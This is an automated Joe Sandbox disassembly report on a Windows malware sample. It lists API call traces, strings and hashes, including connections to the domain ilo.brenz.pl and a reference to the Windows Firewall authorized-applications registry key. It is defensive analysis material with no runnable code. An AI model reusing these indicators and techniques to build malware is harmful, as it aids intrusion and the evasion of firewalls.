Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: LibraryLoad$AddressCountDeleteFileInformationProcSleepTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 3926103657-104948224
Opcode ID: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction ID: d292d2856ce22b528264e3fb5c31764abc2e853f458007e39b67dc21da23dd02
Opcode Fuzzy Hash: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction Fuzzy Hash: BD71D271915718BFEB269F20CC0EEEA37ADDF41311F80011AED5A9E081DAF4AF05D6A5

Function 7FE33127 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 240sleeplibraryfileCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241
Sleep.KERNEL32(00000064,0000001E), ref: 7FE33288
DeleteFileA.KERNEL32(hell32.dll,-1), ref: 7FE3328F
CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
ADVAPI32.DLL, xrefs: 7FE3313A
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: Sleep$AddressCloseCountCreateDeleteFileHandleInformationLibraryLoadProcStartupThreadTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 2219344514-104948224
Opcode ID: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction ID: 9bf7545e8cb9496520d09b0b1350cb01679fb2f5a0313100841ffea94c71ba5e
Opcode Fuzzy Hash: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction Fuzzy Hash: 2871A271915718BFEB269F20DC0EBEA37ACEF41311F80011AED5A9E081DAF46F05D6A5

Function 00479F50 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 224threadlibrarystringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00479F44), ref: 00479F50
CreateThread.KERNEL32(00000000,00000000,Function_00079849,00000000,00000000), ref: 00479FAA
CloseHandle.KERNEL32(?,00000000), ref: 00479FB3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00479FC0
lstrlenA.KERNEL32(ilo.brenz.pl,?,00000000), ref: 0047A018
GetVersionExA.KERNEL32(?,?,00000000), ref: 0047A0BC
CreateThread.KERNEL32(00000000,00000000,Function_000797DA,6F6C6902,00000000), ref: 0047A175
CloseHandle.KERNEL32(?,00000000,6F6C6902,0047CA63,00000000,00000000), ref: 0047A17E
GetTickCount.KERNEL32 ref: 0047A1B7
ExitThread.KERNEL32(00000000), ref: 0047A2E3

Strings

ilo.brenz.pl, xrefs: 0047A017, 0047A026

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadTickVersionlstrlen
String ID: ilo.brenz.pl
API String ID: 486330360-878173267
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 3c8a0648eba9be70d918cda4be6de18bf3e7f2c038df428e2a9b8eb3ece30cf4
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 7F91DE31508248BAEB319F24881DBEE7B6DEF81304F048549E85E9E282D7F85F55C76A

Function 006F3F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(006F3F54), ref: 006F3F60

Part of subcall function 006F3F8F: LoadLibraryA.KERNEL32(006F3F83), ref: 006F3F8F
Part of subcall function 006F3F8F: WSAStartup.WS2_32(00000101), ref: 006F3FCE
Part of subcall function 006F3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 006F3FE9
Part of subcall function 006F3F8F: CloseHandle.KERNEL32(?,00000000), ref: 006F3FF2
Part of subcall function 006F3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 006F3FFF
Part of subcall function 006F3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 006F4097
Part of subcall function 006F3F8F: connect.WS2_32(6F6C6902,006F3B09,00000010), ref: 006F40B1
Part of subcall function 006F3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 006F40FB

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 006F4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 006F4066
wsprintfA.USER32 ref: 006F4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 006F41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,006F6AA2,00000000,00000000), ref: 006F41BD
GetTickCount.KERNEL32 ref: 006F41F6

Strings

020a00 . . :#a260b0403 +*, xrefs: 006F4195, 006F41DB
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\WINDOWS\SYSTEM32\UXTHEME.DLL
API String ID: 2996464229-3907549323
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: f684eac0b46cbfd7949f952aaf2b00fa69753d5dfcf3bb58bdca5638ee546245
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: 9D81F071508299BFEB219F348C5ABFA7BAEEF41300F040658EA498E5C2CAF45F45C765

Function 7FE33392 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177networksleeplibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33386), ref: 7FE33392
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE33412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 7FE3341D
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33453
connect.WS2_32(?,7FE32EB6,00000010), ref: 7FE3346D
GetVersionExA.KERNEL32(?,?,7FE32EB6,00000010), ref: 7FE334B7

Strings

ilo.brenz.pl, xrefs: 7FE33411, 7FE3341C
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33570, 7FE33590

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: LibraryLoadSleepStartupVersionconnectgethostbynamelstrlensocket
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$ilo.brenz.pl
API String ID: 801863514-1010093679
Opcode ID: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction ID: ec9582b3104ee8db84d86a8e063e61350cf898793cca2a983ffbcde4064a8b90
Opcode Fuzzy Hash: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction Fuzzy Hash: 0361D132A04359BFEB22CF24C819FDE3BBDAF41715F440514E86A9E091D6F4AB04DBA5

Function 00402730 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 83sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 004027A8
CreateMutexA.KERNEL32(00000000,00000000,100200), ref: 004027C8
GetLastError.KERNEL32 ref: 004027CE
ExitProcess.KERNEL32 ref: 004027DC
WaitForSingleObject.KERNEL32(00000000,000000FF,Function_000019C0,00000000), ref: 00402864
CloseHandle.KERNEL32(?), ref: 0040286D
Sleep.KERNEL32(0000012C), ref: 00402887

Strings

100200, xrefs: 0040273F, 004027C1
8@, xrefs: 00402838
j7@, xrefs: 00402744
hra%u.dll, xrefs: 004027F1
<6@, xrefs: 004027F7
X7@, xrefs: 0040274A

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep$CloseCreateErrorExitHandleLastMutexObjectProcessSingleWait
String ID: 100200$<6@$X7@$hra%u.dll$j7@$8@
API String ID: 482528292-700769639
Opcode ID: 1e47b03f81b28842055db56df177672559bc8670de47ada2c4e5fdc5ca35fded
Instruction ID: 4773f610d1753618e182b41886d2e1a4b90cb22de96b73be237ab8051f55e4f2
Opcode Fuzzy Hash: 1e47b03f81b28842055db56df177672559bc8670de47ada2c4e5fdc5ca35fded
Instruction Fuzzy Hash: B8315CB0554301AFD300AB71EF89F5A7AA9AB98704F11013EF585B21E2CFF958048F6C

Function 00404A93 Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 287sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(0000000A), ref: 00404E97
ExitThread.KERNEL32 ref: 00404EA3

Strings

L8@, xrefs: 00404B7A
%d.%d.%d.%d, xrefs: 00404D65
[@, xrefs: 00404B19
P, xrefs: 00404C47
8@, xrefs: 00404ACC
@, xrefs: 00404BBF
<6@, xrefs: 00404D6B
E, xrefs: 00404BA3
192.168.1.244, xrefs: 00404AD8
p8@, xrefs: 00404B2E

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: %d.%d.%d.%d$192.168.1.244$<6@$@$E$L8@$P$p8@$8@$[@
API String ID: 896407411-3061671333
Opcode ID: 3410f6aa03986460e07f35c30161e885734b80fe57aac652988e95c7b84e40c9
Instruction ID: 87275159083c24ec72463f46727c3f40db5767b92ee09eca53101c8822c6a11e
Opcode Fuzzy Hash: 3410f6aa03986460e07f35c30161e885734b80fe57aac652988e95c7b84e40c9
Instruction Fuzzy Hash: F3B1BFB15083459AE710DF60C845B6FB7E5FFC4708F00092DFA89A7291DB74A609CB9B

Function 00479E76 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 276librarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00479E6A), ref: 00479E76

Part of subcall function 00479E8D: GetProcAddress.KERNEL32(00000000,00479E81), ref: 00479E8E
Part of subcall function 00479E8D: GetModuleFileNameA.KERNEL32(00000000,0047CA63,000000C8), ref: 00479EA3
Part of subcall function 00479E8D: CreateThread.KERNEL32(00000000,00000000,00479652,00000000,00000000), ref: 00479F01
Part of subcall function 00479E8D: CloseHandle.KERNEL32(?,1C567C50), ref: 00479F0A

CreateThread.KERNEL32(00000000,00000000,Function_00079849,00000000,00000000), ref: 00479FAA
CloseHandle.KERNEL32(?,00000000), ref: 00479FB3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00479FC0
GetVersionExA.KERNEL32(?,?,00000000), ref: 0047A0BC

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThread$AddressEventFileLibraryLoadModuleNameProcVersion
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4113580538-621207024
Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction ID: 73b50628087bfaf0acc653257c73fcadd5b3fec066be936890dcc58f64a7acd3
Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction Fuzzy Hash: 47A1B071408248BFEB219F648C5ABEE7B6CEF41304F04854AE84D9E182D6F85F45C76A

Function 00405130 Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 274sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
